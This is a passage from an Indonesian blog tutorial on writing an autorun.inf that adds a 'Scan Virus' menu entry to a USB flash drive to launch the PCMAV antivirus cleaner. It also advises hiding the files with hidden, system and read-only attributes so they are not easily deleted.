shell\Scan Virus\command=PCM4V-CL34N32.EXE
shell=Scan Virus
Salin baris-baris INF tersebut, dan simpan sebagai .INF file dengan nama “autorun.inf” (tanpa tanda kutip), kemudian letakkan file “autorun.inf” tersebut pada Root Flash Disk Anda.
KETERANGAN
* Untuk file ICON dari PCMAV, Penulis extract dari file PCMAV-CLN.EXE, yang mana ICON file tersebut juga ditempatkan pada Root Flash Disk. Anda bisa menghilangkan/menghapus baris “icon=PCMAV.ICO” yang digunakan untuk memunculkan ICON File PCMAV sebagai Icon penanda Flash Disk seperti pada screenshot di atas. Baris rujukan ICON ini tidak mempengaruhi proses AutoRun. Namun bila Anda menginginkan PCMAV ICON tersebut, Anda bisa mendownloadnya dengan klik link ini.
* Baris-baris INF tersebut bisa Anda modifikasi sesuai selera tulisan Anda, yang penting path file Anda tidak salah; file tujuan Anda rujuk secara relatif.
* Jangan Lupa, untuk menghindari terhapusnya file dengan begitu mudahnya, sebaiknya sembunyikan saja File Anti Virus berserta library file pendukungnya (bila ada) maupun file “autorun.inf”nya dengan mengeset File Attributnya dengan “hidden” dan bila perlu “system”. Satu rekomendasikan lagi, alangkah baiknya, semua File tersebut Set File Attributenya menjadi “Read Only” agar, secara sederhana, tidak bisa termodifikasi.
Untuk keperluan setting modifikasi File Attribute terbut Anda bisa melakukannya dengan Select All files yang akan disembunyikan, lalu klik kanan file-file tersebut, pilik dan klik “properties”, dan beri tanda centang pada check box “hidden. Sedang untuk set menjadi “system”, Anda bisa menggunakan Windows ATTRIB.EXE di lingkungan kerja DOS atau Anda bisa juga menggunakan Attribute Changer yang berlingkungan kerja GUI. Q = Lho, katanya ga pake tool ya? A = untuk mudahnya, gunakan Attribute Changer bila ATTRIB.EXE dirusak/dihapus Virus/Admin dan Anda malas untuk extract dari Windows CAB
Langganan:
Postingan (Atom)
